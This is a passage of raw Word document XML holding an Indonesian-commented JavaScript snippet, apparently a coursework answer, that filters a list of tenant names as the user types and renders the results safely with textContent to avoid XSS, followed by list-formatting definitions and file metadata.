                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    "PT Delta Prima Manufaktur"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="655DF5FB" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  ];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60B2988A" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E92D7B9" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  const elemenInput = document.querySelector("#kolomPencarian");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="226ABC22" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  const elemenDaftarHasil = document.querySelector("#daftarHasil");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73C03BB7" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  const elemenKeterangan = document.querySelector("#keteranganJumlah");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30BFD3BE" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A2AE807" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  // Fungsi ini bertugas mengosongkan daftar hasil sebelum dilakukan pengisian ulang.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B1443BC" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  // Penghapusan dilakukan melalui removeChild, bukan melalui innerHTML, sesuai ketentuan.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0377726B" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  function kosongkanDaftarHasil() {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="186D34BC" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    while (elemenDaftarHasil.firstChild) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="308CDD2D" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      elemenDaftarHasil.removeChild(elemenDaftarHasil.firstChild);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="270DC8C3" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56DBAA45" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="441FF335" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18C1FF70" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  // Fungsi ini bertugas menyusun ulang (re-render) daftar hasil berdasarkan data yang diterima.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65713497" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">  // Setiap baris dibentuk melalui createElement dan textContent, guna mencegah risiko</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42FB7AF1" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  // Cross-Site Scripting (XSS) sebagaimana dijelaskan pada Soal 2.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44A85395" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  function tampilkanDaftarHasil(dataYangDitampilkan) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="089B416A" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    kosongkanDaftarHasil();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47294185" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    dataYangDitampilkan.forEach((namaTenant) =&gt; {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14C36622" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      const elemenBaris = document.createElement("li");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2731DF86" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      elemenBaris.textContent = namaTenant;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F58E1DC" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      elemenDaftarHasil.appendChild(elemenBaris);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FDD8804" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    });</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00B7EC28" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    elemenKeterangan.textContent = "Ditemukan " + dataYangDitampilkan.length + " dari " + dataSumberTenant.length + " data.";</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AEB60D2" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22EE2B2A" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25FAA531" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  // Proses penyaringan dilakukan setiap kali pengguna mengetik pada kolom pencarian (event "input"),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BA00A1A" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  // sehingga hasil dapat diperbarui secara langsung tanpa memerlukan aksi tambahan dari pengguna.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65B0599A" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  elemenInput.addEventListener("input", (peristiwa) =&gt; {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="396A5C73" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    const kataKunci = peristiwa.target.value.trim().toLowerCase();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40696E6F" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    const hasilPenyaringan = dataSumberTenant.filter((namaTenant) =&gt; {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27BE7D2E" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      return namaTenant.toLowerCase().includes(kataKunci);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51D513EB" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    });</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7669FFC6" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    tampilkanDaftarHasil(hasilPenyaringan);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B86543A" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  });</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B5A144E" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59C9C901" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  // Tampilan awal menampilkan seluruh data sebelum pengguna melakukan pencarian.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D310EF2" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  tampilkanDaftarHasil(dataSumberTenant);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E171CC0" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67B6CC7C" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6ACFAFF9" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;/body&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C9ED81F" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;/html&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34D5F00F" w14:textId="77777777" w:rsidR="0040548A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="29CCE091" w14:textId="77777777" w:rsidR="00B85763" w:rsidRDefault="00B85763"/>
    <w:sectPr w:rsidR="00B857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DD2DFF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B03C83C0"/>
    <w:lvl w:ilvl="0" w:tplc="E99ED900">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="8984353C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="8558F612">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="C16A8FBA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="511ADF0A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="0C52015C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="6D7A7F96">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="457E8116">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="8C900674">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="10982595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8A"/>
    <w:rsid w:val="003D3392"/>
    <w:rsid w:val="0040548A"/>
    <w:rsid w:val="00B70371"/>
    <w:rsid w:val="00B85763"/>
    <w:rsid w:val="00E259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D06BAC8"/>
  <w15:docId w15:val="{3BE6A75F-3981-994C-86EB-D3C20E68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1035</Words>
  <Characters>7639</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>166</Lines>
  <Paragraphs>109</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Izhar Dwiputra</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-09-22T08:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-22T09:09:00Z</dcterms:modified>
</cp:coreProperties>
</file>